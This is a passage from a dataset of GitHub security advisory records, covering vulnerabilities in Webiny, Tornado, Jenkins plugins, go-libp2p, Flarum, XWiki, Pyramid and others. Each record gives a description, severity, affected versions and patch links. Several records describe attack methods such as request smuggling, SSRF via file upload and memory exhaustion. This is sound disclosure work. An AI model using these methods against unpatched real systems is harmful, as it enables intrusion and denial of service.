'https://github.com/marmelroy/Zip'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-1'}, {'type': 'WEB', 'url': 'https://security.snyk.io/research/zip-slip-vulnerability'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:41:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-3x59-vrmc-5mx6,2023-08-31T18:51:43Z,2023-08-24T22:16:20Z,,['CVE-2023-41167'],@webiny/react-rich-text-renderer vulnerable to insecure rendering of rich text content,"## Overview `@webiny/react-rich-text-renderer` is a react component to render data coming from Webiny Headless CMS and Webiny Form Builder. The `@webiny/react-rich-text-renderer` package depends on the [editor.js](https://editorjs.io/) rich text editor to handle rich text content. The CMS stores rich text content from the `editor.js` into the database. When the `@webiny/react-rich-text-renderer` is used to render such content, it uses the `dangerouslySetInnerHTML` prop, without applying HTML sanitization. The issue arises when an actor, who in this context would specifically be a content manager with access to the CMS, inserts a malicious script as part of the user-defined input. This script is then injected and executed within the user's browser when the main page or admin page loads. ## Am I affected? You will be affected if you're running a Webiny project created prior to `5.35.0` and you're using the legacy rich text editor (which uses `editor.js` library under the hood). If you've already switched to using the new rich text editor, powered by Lexical editor, you will not be affected by this. ## How do I patch this vulnerability? Update to Webiny version `5.37.2`. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@webiny/react-rich-text-renderer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.37.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.37.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/webiny/webiny-js/security/advisories/GHSA-3x59-vrmc-5mx6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41167'}, {'type': 'WEB', 'url': 'https://github.com/webiny/webiny-js/commit/8748bc53fe862bb03d4459ccc0be39084a5d35c0'}, {'type': 'PACKAGE', 'url': 'https://github.com/webiny/webiny-js'}, {'type': 'WEB', 'url': 'https://webiny.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:16:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-qppv-j76h-2rpx,2023-08-14T21:34:17Z,2023-08-14T21:34:17Z,,[],Tornado vulnerable to HTTP request smuggling via improper parsing of `Content-Length` fields and chunk lengths,"## Summary Tornado interprets `-`, `+`, and `_` in chunk length and `Content-Length` values, which are not allowed by the HTTP RFCs. This can result in request smuggling when Tornado is deployed behind certain proxies that interpret those non-standard characters differently. This is known to apply to older versions of haproxy, although the current release is not affected. ## Details Tornado uses the `int` constructor to parse the values of `Content-Length` headers and chunk lengths in the following locations: ### `tornado/http1connection.py:445` ```python3 self._expected_content_remaining = int(headers[""Content-Length""]) ``` ### `tornado/http1connection.py:621` ```python3 content_length = int(headers[""Content-Length""]) # type: Optional[int] ``` ### `tornado/http1connection.py:671` ```python3 chunk_len = int(chunk_len_str.strip(), 16) ``` Because `int(""0_0"") == int(""+0"") == int(""-0"") == int(""0"")`, using the `int` constructor to parse and validate strings that should contain only ASCII digits is not a good strategy. ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'tornado'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tornadoweb/tornado/security/advisories/GHSA-qppv-j76h-2rpx'}, {'type': 'WEB', 'url': 'https://github.com/tornadoweb/tornado/commit/b7a5dd29bb02950303ae96055082c12a1ea0a4fe'}, {'type': 'PACKAGE', 'url': 'https://github.com/tornadoweb/tornado'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:34:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-hv48-hgp6-xpqf,2023-08-16T21:12:56Z,2023-08-16T15:30:18Z,,['CVE-2023-40342'],Jenkins Flaky Test Handler Plugin stored cross-site scripting vulnerability,"Jenkins Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents. Flaky Test Handler Plugin 1.2.3 escapes JUnit test contents when showing them on the Jenkins UI.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:flaky-test-handler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40342'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3223'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:12:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-rg2c-cfxv-qp6f,2023-09-06T15:32:33Z,2023-08-08T18:30:37Z,,['CVE-2023-3894'],Denial of service in jackson-dataformats-text,"Those using jackson-dataformats-text to parse TOML data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.dataformat:jackson-dataformats-text'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3894'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-text/pull/398'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-text/commit/5dd5f740aedcf37adad7ffece460e75e54abb0ed'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50083'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-dataformats-text'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-text/blob/2.16/release-notes/VERSION-2.x'}]","{'cwe_ids': ['CWE-20', 'CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T12:52:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-876p-8259-xjgg,2023-09-11T18:32:44Z,2023-08-09T13:18:18Z,,['CVE-2023-39533'],libp2p nodes vulnerable to attack using large RSA keys,"### Impact A malicious peer can use large RSA keys to run a resource exhaustion attack & force a node to spend time doing signature verification of the large key. This vulnerability is present in the core/crypto module of go-libp2p and can occur during the Noise handshake and the libp2p x509 extension verification step. To prevent this attack, go-libp2p now restricts RSA keys to <= 8192 bits. ### Patches Users should upgrade their go-libp2p versions to >=v0.27.8, >= v0.28.2, or >=v0.29.1 To protect your application, it's necessary to update to these patch releases **AND** to use the updated Go compiler (1.20.7 or 1.19.12, respectively) ### Workarounds There are no known workarounds ### References The Golang crypto/tls package also had this vulnerability (""verifying certificate chains containing large RSA keys is slow” https://github.com/golang/go/issues/61460) Fix in golang/go crypto/tls: https://github.com/golang/go/commit/2350afd2e8ab054390e284c95d5b089c142db017 Fix in quic-go https://github.com/quic-go/quic-go/pull/4012 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/libp2p/go-libp2p'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/libp2p/go-libp2p'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.28.0'}, {'fixed': '0.28.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/libp2p/go-libp2p'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.29.0'}, {'fixed': '0.29.1'}]}], 'versions': ['0.29.0']}]","[{'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/security/advisories/GHSA-876p-8259-xjgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39533'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/issues/61460'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/pull/2454'}, {'type': 'WEB', 'url': 'https://github.com/quic-go/quic-go/pull/4012'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/commit/2350afd2e8ab054390e284c95d5b089c142db017'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/commit/0cce607219f3710addc7e18672cffd1f1d912fbb'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/commit/445be526aea4ee0b1fa5388aa65d32b2816d3a00'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/commit/e30fcf7dfd4715ed89a5e68d7a4f774d3b9aa92d'}, {'type': 'PACKAGE', 'url': 'https://github.com/libp2p/go-libp2p'}, {'type': 'WEB', 'url': 'https://go.dev/issue/61460'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:18:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-67c6-q4j4-hccg,2023-08-16T21:02:52Z,2023-08-16T21:02:52Z,,['CVE-2023-40033'],Flarum vulnerable to LFI and Blind SSRF via Avatar upload,"## Impact The Flarum forum software is affected by a vulnerability that allows an attacker to conduct a Blind SSRF attack or disclose any file on the server, even with a basic user account on any Flarum forum. By uploading a file containing a URL and spoofing the MIME type, an attacker can manipulate the application to execute unintended actions. The vulnerability is due to the behavior of the `intervention/image` package, which attempts to interpret the supplied file contents as a URL, which then fetches its contents. This allows an attacker to exploit the vulnerability to perform SSRF attacks, disclose local file contents, or conduct a blind oracle attack. ### Patches This has been patched in Flarum **v1.8**. ## Workarounds As a temporary workaround for the SSRF aspect of the vulnerability, one can disable PHP's `allow_url_fopen` which will prevent the fetching of external files via URLs. ### Credits Adam Kues - [Assetnote](https://assetnote.io/) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'flarum/core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'flarum/framework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/flarum/framework/security/advisories/GHSA-67c6-q4j4-hccg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40033'}, {'type': 'WEB', 'url': 'https://github.com/flarum/framework/commit/d1059c1cc79fe61f9538f3da55e8f42abbede570'}, {'type': 'PACKAGE', 'url': 'https://github.com/flarum/framework'}]","{'cwe_ids': ['CWE-918', 'CWE-98'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:02:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-5mf8-v43w-mfxp,2023-08-21T20:10:55Z,2023-08-21T20:10:55Z,,['CVE-2023-40177'],XWiki Platform privilege escalation (PR) from account through AWM content fields,"### Impact Any registered user can use the content field of their user profile page to execute arbitrary scripts with programming rights, thus effectively performing rights escalation. The problem is present [since version 4.3M2](https://jira.xwiki.org/browse/XWIKI-7369) when AppWithinMinutes Application added support for the Content field, allowing any wiki page (including the user profile page) to use its content as an AWM Content field, which has a custom displayer that executes the content with the rights of the ``AppWithinMinutes.Content`` author, rather than the rights of the content author. ### Patches The issue has been fixed in XWiki 14.10.5 and 15.1RC1 by https://github.com/xwiki/xwiki-platform/commit/dfb1cde173e363ca5c12eb3654869f9719820262 . The fix is in the content of the [AppWithinMinutes.Content](https://github.com/xwiki/xwiki-platform/commit/dfb1cde173e363ca5c12eb3654869f9719820262#diff-850f6875c40cf7932f40a985e99679a041891c6ee75d10239c06921c0019cf78R82) page that defines the custom displayer. By using the ``display`` script service to render the content we make sure that the proper author is used for access rights checks. ### Workarounds If you want to fix this problem on older versions of XWiki that have not been patched then you need to modify the content of ``AppWithinMinutes.Content`` page to use the ``display`` script service to render the content, like this: ``` - {{html}}$tdoc.getRenderedContent($tdoc.content, $tdoc.syntax.toIdString()).replace('{{', '&#123;&#123;'){{/html}} + {{html}}$services.display.content($tdoc, { + 'displayerHint': 'default' + }).replace('{{/html}}', '&#123;&#123;/html&#125;&#125;'){{/html}} ``` ### References * JIRA issue https://jira.xwiki.org/browse/XWIKI-19906 * Fix https://github.com/xwiki/xwiki-platform/commit/dfb1cde173e363ca5c12eb3654869f9719820262 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been found and reported by @michitux .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3-milestone-2'}, {'fixed': '14.10.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5mf8-v43w-mfxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40177'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/dfb1cde173e363ca5c12eb3654869f9719820262'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-7369'}]","{'cwe_ids': ['CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:10:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-gcq9-qqwx-rgj3,2023-09-14T16:23:15Z,2023-08-24T22:22:59Z,,['CVE-2023-40583'],libp2p nodes vulnerable to OOM attack,"### Summary In go-libp2p, by using signed peer records a malicious actor can store an arbitrary amount of data in a remote node’s memory. This memory does not get garbage collected and so the victim can run out of memory and crash. It is feasible to do this at scale. An attacker would have to transfer ~1/2 as much memory it wants to occupy (2x amplification factor). The attacker can perform this attack over time as the target node’s memory will not be garbage collected. This can occur because when a signed peer record is received, only the signature validity check is performed but the sender signature is not checked. Signed peer records from randomly generated peers can be sent by a malicious actor. A target node will accept the peer record as long as the signature is valid, and then stored in the peer store. There is cleanup logic in the peer store that cleans up data when a peer disconnects, but this cleanup is never triggered for the fake peer (from which signed peer records were accepted) because it was never “connected”. ### Impact If users of go-libp2p in production are not monitoring memory consumption over time, it could be a silent attack i.e. the attacker could bring down nodes over a period of time (how long depends on the node resources i.e. a go-libp2p node on a virtual server with 4 gb of memory takes about 90 sec to bring down; on a larger server, it might take a bit longer.) ### Patches Update your go-libp2p dependency to the latest release, v0.30.0 at the time of writing. If you'd like to stay on the 0.27.x release, we strongly recommend users to update to go-libp2p [0.27.7](https://github.com/libp2p/go-libp2p/releases/tag/v0.27.7). Though this OOM issue was fixed in 0.27.4, there were subsequent patch releases afterwards (important fixes for other issues unrelated to the OOM). ### Workarounds None","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/libp2p/go-libp2p'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.27.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/security/advisories/GHSA-gcq9-qqwx-rgj3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40583'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/commit/45d3c6fff662ddd6938982e7e9309ad5fa2ad8dd'}, {'type': 'PACKAGE', 'url': 'https://github.com/libp2p/go-libp2p'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/releases/tag/v0.27.4'}, {'type': 'WEB', 'url': 'https://github.com/libp2p/go-libp2p/releases/tag/v0.27.7'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:22:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-qq8m-9rpx-w2fm,2023-08-09T14:30:23Z,2023-08-06T03:30:13Z,,['CVE-2023-4190'],Admidio Insufficient Session Expiration vulnerability,"Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.2.11. This vulnerability allows a user's session to remain valid even after the user has logged out, potentially granting unauthorized access to sensitive areas and functionalities.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4190'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/391fb2af5bee641837a58e7dd66ff76eac92bb74'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/71bc75d2-320c-4332-ad11-9de535a06d92'}]","{'cwe_ids': ['CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:30:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-65rp-cv85-263x,2023-08-31T16:54:03Z,2023-08-22T21:30:26Z,,['CVE-2022-34038'],etcd denial of service vulnerability,Etcd v3.5.4 allows remote attackers to cause a denial of service via function PageWriter.write in pagewriter.go,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'go.etcd.io/etcd/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-34038'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/pull/14022'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/pull/14452'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/5a315ef88fbfa454e02d27b0b8acb4f89457cd90'}, {'type': 'PACKAGE', 'url': 'https://github.com/etcd-io/etcd'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:25:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-7vxc-q7rv-qfj8,2023-08-21T19:33:46Z,2023-08-11T15:30:46Z,,['CVE-2021-29057'],SUCHMOKUO node-worker-threads-pool denial of service Vulnerability,An issue was discovered in StaticPool in SUCHMOKUO node-worker-threads-pool version 1.4.3 that allows attackers to cause a denial of service.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-worker-threads-pool'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29057'}, {'type': 'WEB', 'url': 'https://github.com/SUCHMOKUO/node-worker-threads-pool/issues/20'}, {'type': 'PACKAGE', 'url': 'https://github.com/SUCHMOKUO/node-worker-threads-pool'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:16:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-8c93-4hch-xgxp,2023-08-31T16:43:19Z,2023-08-03T16:34:31Z,,['CVE-2023-3348'],Cloudflare Wrangler directory traversal vulnerability,"### Impact The Wrangler command line tool (<=wrangler@3.1.0 or <=wrangler@2.20.1) was affected by a directory traversal vulnerability when running a local development server for Pages (wrangler pages dev command). This vulnerability enabled an attacker in the same network as the victim to connect to the local development server and access the victim's files present outside of the directory for the development server. ### Patches Wrangler2: Upgrade to v2.20.1 or higher. Wrangler3: Upgrade to v3.1.1 or higher. ### References [Workers SDK on Github](https://github.com/cloudflare/workers-sdk) [Wrangler docs](https://developers.cloudflare.com/workers/wrangler/) [CVE-2023-3348](https://www.cve.org/CVERecord?id=CVE-2023-3348)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wrangler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.20.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-8c93-4hch-xgxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3348'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/workers-sdk/pull/3498'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/workers-sdk/commit/fddffdf0c23d2ca56f2139a2c6bc278052594cba'}, {'type': 'WEB', 'url': 'https://developers.cloudflare.com/workers/wrangler/'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/workers-sdk'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/workers-sdk/releases/tag/wrangler%403.1.1'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:34:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-7vh7-fw88-wj87,2023-08-08T17:12:00Z,2023-08-08T17:12:00Z,,[],Several quadratic complexity bugs may lead to denial of service in Commonmarker,"## Impact Several quadratic complexity bugs in commonmarker's underlying [`cmark-gfm`](https://github.com/github/cmark-gfm) library may lead to unbounded resource exhaustion and subsequent denial of service. The following vulnerabilities were addressed: * [CVE-2023-37463](https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5) For more information, consult the release notes for version [`0.29.0.gfm.12`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12). ## Mitigation Users are advised to upgrade to commonmarker version [`0.23.10`](https://rubygems.org/gems/commonmarker/versions/0.23.10).",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'commonmarker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-7vh7-fw88-wj87'}, {'type': 'WEB', 'url': 'https://github.com/gjtorikian/commonmarker/commit/db8cd377b54541f7fd484d168b7682a282a680f7'}, {'type': 'WEB', 'url': 'https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12'}, {'type': 'PACKAGE', 'url': 'https://github.com/gjtorikian/commonmarker'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/commonmarker/versions/0.23.10'}]","{'cwe_ids': ['CWE-407'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-08T17:12:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-j8g2-6fc7-q8f8,2023-09-01T17:38:42Z,2023-08-25T18:49:25Z,,['CVE-2023-40587'],Pyramid static view path traversal up one directory,"### Impact This impacts users of Python 3.11 that are using a Pyramid static view with a full filesystem path and have a `index.html` file that is located exactly one directory above the location of the static view's file system path. No further path traversal exists, and the only file that could be disclosed accidentally is `index.html`. Example: ``` config.add_static_view(name='static', path='/usr/src/app/static', cache_max_age=0) ``` And directory tree: ``` /usr/src/app \ | - static \ | - file.css | - index.html | - ... | - index.html <-- (this file could be disclosed with this bug) ``` ### Patches Pyramid now will reject any path that contains a null-byte out of caution. While valid in directory/file names, we would strongly consider it a mistake to use null-bytes in naming files/directories. Secondly, Python 3.11, and 3.12 has fixed the underlying issue in `os.path.normpath` to no longer truncate on the first `0x00` found, returning the behavior to pre-3.11 Python, un an as of yet unreleased version, see: - https://github.com/python/cpython/issues/106242 - https://github.com/python/cpython/pull/106816 At the time the following Python versions are not fixed: - Python 3.11.0 to 3.11.4 - Python 3.12.0a1 to 3.12.0rc1 Fixes will be available in: Python 3.12.0rc2 or 3.11.5. Please note that release candidates of Python are not production ready and should not be used for production workloads. ### Workarounds Use a version of Python 3 that is not affected. Downgrade to Python 3.10 series temporarily, or wait till Python 3.11.5 is released and upgrade to the latest version of Python 3.11 series. ### References - https://owasp.org/www-community/attacks/Path_Traversal - VN: JVN#41113329 - TN: JPCERT#93311166 ### Thanks - Masashi Yamane of LAC Co., Ltd","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyramid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Pylons/pyramid/security/advisories/GHSA-j8g2-6fc7-q8f8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40587'}, {'type': 'WEB', 'url': 'https://github.com/python/cpython/issues/106242'}, {'type': 'WEB', 'url': 'https://github.com/python/cpython/pull/106816'}, {'type': 'WEB', 'url': 'https://github.com/Pylons/pyramid/commit/347d7750da6f45c7436dd0c31468885cc9343c85'}, {'type': 'PACKAGE', 'url': 'https://github.com/Pylons/pyramid'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYSDTQ7NP5GHPQ7HBE47MBJQK7YEIYMF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OQIPHQTM3XE5NIEXCTQFV2J2RK2YUSMT/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T18:49:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-v9vc-7x69-c2x8,2023-08-03T16:42:28Z,2023-08-03T06:30:22Z,,['CVE-2023-4124'],Answer Missing Authorization vulnerability,Missing Authorization in GitHub repository answerdev/answer prior to v1.1.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4124'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/964195fd859ee5d7171fac847374dfa31893e793'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2c684f99-d181-4106-8ee2-64a76ae6a348'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-rc33-44qp-vpvq,2023-08-16T21:04:57Z,2023-08-16T15:30:18Z,,['CVE-2023-40349'],Jenkins Gogs Plugin vulnerable to unsafe default behavior and information disclosure,"Jenkins Gogs Plugin provides a webhook endpoint at /gogs-webhook that can be used to trigger builds of jobs. In Gogs Plugin 1.0.15 and earlier, an option to specify a Gogs secret for this webhook is provided, but not enabled by default. This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified job name. Additionally, the output of the webhook endpoint includes whether a job corresponding to the attacker-specified job name exists, even if the attacker has no permission to access it. As of 